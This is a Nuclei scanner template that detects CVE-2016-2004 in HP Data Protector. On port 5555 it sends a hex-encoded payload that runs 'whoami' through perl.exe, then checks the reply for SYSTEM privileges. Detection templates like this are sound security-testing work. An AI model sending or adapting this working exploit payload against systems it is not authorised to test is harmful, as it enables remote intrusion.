id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
    epss-score: 0.06793
  metadata:
    max-request: 1
    product: data_protector
    vendor: hp
  tags: cve,cve2016,network,iot,hp,rce,edb

tcp:
  - host:
      - "{{Hostname}}"
    port: 5555
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex

    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950